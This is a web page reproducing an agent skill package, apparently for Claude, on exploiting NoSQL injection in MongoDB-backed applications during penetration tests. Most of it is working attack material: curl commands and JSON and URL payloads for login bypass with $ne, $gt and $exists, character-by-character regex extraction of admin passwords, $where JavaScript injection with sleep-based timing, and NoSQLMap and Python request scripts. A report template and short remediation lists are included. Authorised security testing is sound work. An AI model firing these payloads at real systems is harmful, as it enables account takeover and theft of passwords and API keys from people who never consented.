What it does. Detects and exploits NoSQL injection vulnerabilities in MongoDB, CouchDB, Part of mukul975/Anthropic-Cybersecurity-Skills (817 security skills) (mukul975/Anthropic-Cybersecurity-Skills).
Install
npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-nosql-injection-vulnerabilities, or copy the skill folder into ~/.claude/skills/exploiting-nosql-injection-vulnerabilities/.
- Raw file:
curl -sL https://raw.githubusercontent.com/mukul975/Anthropic-Cybersecurity-Skills/HEAD/skills/exploiting-nosql-injection-vulnerabilities/SKILL.md
SKILL.md (verbatim)
name: exploiting-nosql-injection-vulnerabilities
description: Detects and exploits NoSQL injection vulnerabilities in MongoDB, CouchDB,
and similar databases to demonstrate authentication bypass, data extraction, and
unauthorized access via crafted query operators. Use when pentesting APIs or web
applications backed by NoSQL databases to test input validation and injection
defenses.
domain: cybersecurity
subdomain: web-application-security
tags:
- nosql-injection
- mongodb
- authentication-bypass
- injection-attack
- web-security
- database-security
- api-testing
version: '1.0'
author: mahipal
license: Apache-2.0
nist_csf:
- PR.PS-01
- ID.RA-01
- PR.DS-10
- DE.CM-01
mitre_attack:
- T1190
- T1059.007
- T1505.003
- T1083
- T1055
Exploiting NoSQL Injection Vulnerabilities
When to Use
- During web application penetration testing of applications using NoSQL databases
- When testing authentication mechanisms backed by MongoDB or similar databases
- When assessing APIs that accept JSON input for database queries
- During bug bounty hunting on applications with NoSQL backends
- When performing security code review of database query construction
Prerequisites
- Burp Suite Professional or Community Edition with JSON support
- NoSQLMap tool installed (
pip install nosqlmap or from GitHub)
- Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
- Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
- Proxy configured for HTTP traffic interception
- Python 3.x for custom payload scripting
Workflow
Step 1 — Identify NoSQL Injection Points
# Look for JSON-based login forms or API endpoints
# Common indicators: application accepts JSON POST bodies, uses MongoDB
# Test with basic syntax-breaking characters
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin\"", "password": "test"}'
# Test for operator injection in query parameters
curl "http://target.com/api/users?username[$ne]=invalid"
# Check for error-based detection
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"query": {"$gt": ""}}'
# Basic authentication bypass with $ne operator
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'
# Bypass with $gt operator
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'
# Target specific user with regex
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$regex": ".*"}}'
# Bypass using $exists operator
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$exists": true}, "password": {"$exists": true}}'
# Extract username character by character using $regex
# Test if first character of admin password is 'a'
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$regex": "^a"}}'
# Test if first two characters are 'ab'
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$regex": "^ab"}}'
# Enumerate usernames with regex
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'
Step 4 — Exploit JavaScript Injection via $where
# JavaScript injection through $where operator
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"$where": "this.username == \"admin\""}'
# Time-based detection with sleep
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"$where": "sleep(5000) || this.username == \"admin\""}'
# Data exfiltration via $where with string comparison
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"$where": "this.password.match(/^a/) != null"}'
Step 5 — Use NoSQLMap for Automated Testing
# Clone and setup NoSQLMap
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python setup.py install
# Run NoSQLMap against target
python nosqlmap.py -u http://target.com/api/login \
--method POST \
--data '{"username":"test","password":"test"}'
# Alternative: use nosqli scanner
pip install nosqli
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'
Step 6 — Test URL Parameter Injection
# Parameter-based injection (GET requests)
curl "http://target.com/api/users?username[$ne]=&password[$ne]="
curl "http://target.com/api/users?username[$regex]=admin&password[$gt]="
curl "http://target.com/api/users?username[$exists]=true"
# Array injection via URL parameters
curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root"
# Inject via HTTP headers if processed by backend
curl http://target.com/api/profile \
-H "X-User-Id: {'\$ne': null}"
Key Concepts
| Concept |
Description |
| Operator Injection |
Injecting MongoDB operators ($ne, $gt, $regex) into query parameters |
| Authentication Bypass |
Using operators to match any document and bypass login checks |
| Blind Extraction |
Character-by-character data extraction using $regex boolean responses |
| $where Injection |
Executing arbitrary JavaScript on the MongoDB server via $where operator |
| Type Juggling |
Exploiting how NoSQL databases handle different input types (string vs object) |
| BSON Injection |
Manipulating Binary JSON serialization in MongoDB wire protocol |
| Server-Side JS |
JavaScript execution context available in MongoDB for query evaluation |
| Tool |
Purpose |
| NoSQLMap |
Automated NoSQL injection detection and exploitation framework |
| Burp Suite |
HTTP proxy for intercepting and modifying JSON requests |
| MongoDB Shell |
Direct database interaction for testing query behavior |
| nosqli |
Dedicated NoSQL injection scanner and exploitation tool |
| PayloadsAllTheThings |
Curated NoSQL injection payload repository |
| Nuclei |
Template-based scanner with NoSQL injection detection templates |
| Postman |
API testing platform for crafting NoSQL injection requests |
Common Scenarios
- Login Bypass — Bypass MongoDB-backed authentication using
{"$ne": ""} operator injection in username and password fields
- Data Enumeration — Extract database contents character by character using
$regex blind injection when no direct output is visible
- Privilege Escalation — Modify user role fields through NoSQL injection in profile update endpoints
- API Key Extraction — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
- Account Takeover — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass
## NoSQL Injection Assessment Report
- **Target**: http://target.com/api/login
- **Database**: MongoDB 6.0
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
- **Severity**: Critical (CVSS 9.8)
### Vulnerable Parameters
| Endpoint | Parameter | Injection Type | Impact |
|----------|-----------|---------------|--------|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
| POST /api/login | password | Regex ($regex) | Data Extraction |
| GET /api/users | id | $where JS Injection | RCE Potential |
### Proof of Concept
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
- Extracted 3 admin passwords via blind regex injection
- JavaScript execution confirmed via $where operator
### Remediation
- Use parameterized queries with MongoDB driver sanitization
- Implement input type validation (reject objects where strings expected)
- Disable server-side JavaScript execution ($where) in MongoDB config
- Apply least-privilege database access controls
Other files in this skill
assets/template.md (verbatim)
NoSQL Injection Assessment Report Template
- Application URL: [url]
- Database Type: MongoDB / CouchDB / Other
- Assessment Date: [date]
- Tester: [name]
Findings Summary
| Finding |
Severity |
Endpoint |
Impact |
| Operator Injection |
Critical |
POST /api/login |
Authentication Bypass |
| Blind Regex Extraction |
High |
POST /api/login |
Data Leakage |
| $where JS Injection |
Critical |
POST /api/search |
Potential RCE |
Detailed Findings
Finding 1: Authentication Bypass via Operator Injection
- Endpoint: POST /api/login
- Payload:
{"username":{"$ne":""},"password":{"$ne":""}}
- Impact: Complete authentication bypass allowing access to any account
- CVSS Score: 9.8 (Critical)
- Validate input types — reject objects/arrays where strings are expected
- Use MongoDB driver parameterized query methods
- Implement server-side schema validation with JSON Schema
- Disable $where and mapReduce JavaScript execution
- Apply least-privilege database user permissions
references/api-reference.md (verbatim)
API Reference: NoSQL Injection Testing
MongoDB Query Operators
| Operator |
Description |
Injection Use |
$ne |
Not equal |
Bypass authentication |
$gt |
Greater than |
Extract data |
$regex |
Regular expression |
Pattern matching |
$exists |
Field exists |
Enumerate fields |
$where |
JavaScript expression |
Code execution |
$or |
Logical OR |
Logic bypass |
Authentication Bypass Payloads
GET Parameters
?username[$ne]=&password[$ne]=
?username=admin&password[$gt]=
?username[$regex]=admin.*&password[$ne]=
JSON Body
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$regex": "^admin"}, "password": {"$ne": ""}}
{"username": {"$regex": "^a"}, "password": {"$ne": ""}}
{"username": {"$regex": "^ad"}, "password": {"$ne": ""}}
{"username": {"$regex": "^adm"}, "password": {"$ne": ""}}
$where JavaScript Injection
{"$where": "this.username == 'admin' && this.password.match(/^a/)"}
Error-Based Detection
MongoDB Error Messages
| Error |
Indicator |
MongoError |
MongoDB driver error |
CastError |
Invalid ObjectId |
BSONTypeError |
Invalid BSON type |
SyntaxError |
JavaScript parse error |
NoSQLMap
python nosqlmap.py --url http://target/api/login --method POST \
--data '{"username":"test","password":"test"}'
Burp Suite Intruder
Use NoSQL payload wordlist with parameter fuzzing.
Python requests Testing
GET Injection
import requests
url = "http://target/api/users"
resp = requests.get(f"{url}?username[$ne]=&password[$ne]=")
JSON Injection
payload = {"username": {"$ne": ""}, "password": {"$ne": ""}}
resp = requests.post(url, json=payload)
- Use parameterized queries (never concatenate user input)
- Validate input types (reject objects where strings expected)
- Use
mongo-sanitize or equivalent input sanitization
- Disable
$where operator if not needed
- Implement proper authentication (don't rely on query-level checks)
references/standards.md (verbatim)
Standards & References — NoSQL Injection
Industry Standards
- OWASP Top 10 2021 A03 — Injection (includes NoSQL injection)
- OWASP Testing Guide — Testing for NoSQL Injection (WSTG-INPV-05.6)
- CWE-943 — Improper Neutralization of Special Elements in Data Query Logic
- MITRE ATT&CK T1190 — Exploit Public-Facing Application
Technical References
references/workflows.md (verbatim)
Workflows — NoSQL Injection Exploitation
Detection Workflow
- Identify application technology stack (check for MongoDB, CouchDB indicators)
- Map all input points accepting JSON data or query parameters
- Submit operator payloads ($ne, $gt, $regex) in each parameter
- Monitor responses for authentication bypass or data leakage
- Test for JavaScript injection via $where operator
- Document all vulnerable endpoints with proof-of-concept payloads
- Confirm boolean-based injection by comparing true/false responses
- Determine password/field length using $regex with length patterns
- Extract characters one at a time using $regex "^<known_chars><test>"
- Automate extraction with Python script using binary search
- Validate extracted data by attempting authentication
Automated Scanning Workflow
- Configure proxy (Burp Suite) to intercept target traffic
- Run NoSQLMap against identified endpoints
- Use nuclei with NoSQL injection templates for broad coverage
- Manually verify automated findings with crafted payloads
- Escalate confirmed findings to data extraction or RCE attempts
Back to mukul975/Anthropic-Cybersecurity-Skills (817 security skills) or Agent skills.